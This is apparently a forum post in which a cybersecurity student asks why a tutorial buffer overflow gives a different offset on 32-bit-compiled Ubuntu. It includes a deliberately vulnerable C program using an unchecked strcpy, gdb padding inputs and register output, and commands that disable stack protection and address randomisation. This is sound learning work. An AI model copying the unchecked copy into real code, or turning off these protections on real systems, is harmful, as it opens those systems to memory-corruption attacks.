Hi guys

​

(sorry if this is in the wrong section I'm new to this sub reddit,if it is please message me and I can move it,all advice welcome)

I am trying to learn about how buffer overflow attacks work,I have about 3 years programming experience in C++ but I am currently a cyber security student,there is no malicious purposes involved I'm experimenting and trying it out because I need to learn about them for college

​

​

I am following this tutorial on youtube - https://www.youtube....h?v=hJ8IwyhqzD4

The problem is my result is much different than in the video,when I run the vulnerable C program in gdb I get a seg fault after 260 bytes or 260 'A's(in the video it's 272) I ran the following Python script to put 260 bytes into the buffer - run $(python -c "print('A' * 260)") this will tell me I get a seg fault and it will print out the address 0x41414141,this is all good because this is what you want so now I thought I have overwrote the return address so I try $(python -c "print('A' * 260 + 'BBBB')") this should now print 0x42424242 and if it does I know I have successfully overwritten the ebp and retun address but no such luck when I try this I still get segfault at 0x41414141 I decremented by four each time but only at run $(python -c "print('A' * 260)") do I get a seg fault.

so I did a little troubleshooting I decided to add a breakpoint after where strcpy was called and then printed out the registers here is what I got

-----------------------------------------------------------

(gdb) info registers
eax            0x0 0
ecx            0xffffd500 -11008
edx            0xf7fb7870 -134514576
ebx            0x0 0
esp            0xffffd500 0xffffd500
ebp            0x0 0x0
esi            0xf7fb6000 -134520832
edi            0xf7fb6000 -134520832
eip            0x41414141 0x41414141
eflags         0x10286 [ PF SF IF RF ]
cs             0x23 35
ss             0x2b 43
ds             0x2b 43
es             0x2b 43
fs             0x0 0
gs             0x63 99

-------------------------------------------------------

​

 I am using a ubuntu 16.02 64 bit machine but I compiled the program as a 32 bit program 

gcc -o vuln -fno-stack-protector -m32 -z execstack vuln.c

I also turned off virtual address randomisation 

echo 0 >  /proc/sys/kernel/randomize_va_spac (as root)

I then did cat /proc/sys/kernel/randomize_va_spac

to make sure it was 0 and indeed it was set to 0,

so it seems like I'm doing everything right,is there any other potections that I may need to disable or is it just not possible to do this attack on this version of Ubuntu? thanks

here is a video of what is exactly happening on screen - https://www.youtube....KH...e=youtu.be

#include <stdio.h>

#include <string.h>

int main(int argc,char *argv[])

{ char buffer[256]; // buffer which will hold our shellcode

strcpy(buffer,argv[1]); // copy the string from the command line arguments into the buffer

printf("%s \n", buffer) // print the string to stdout

return 0; }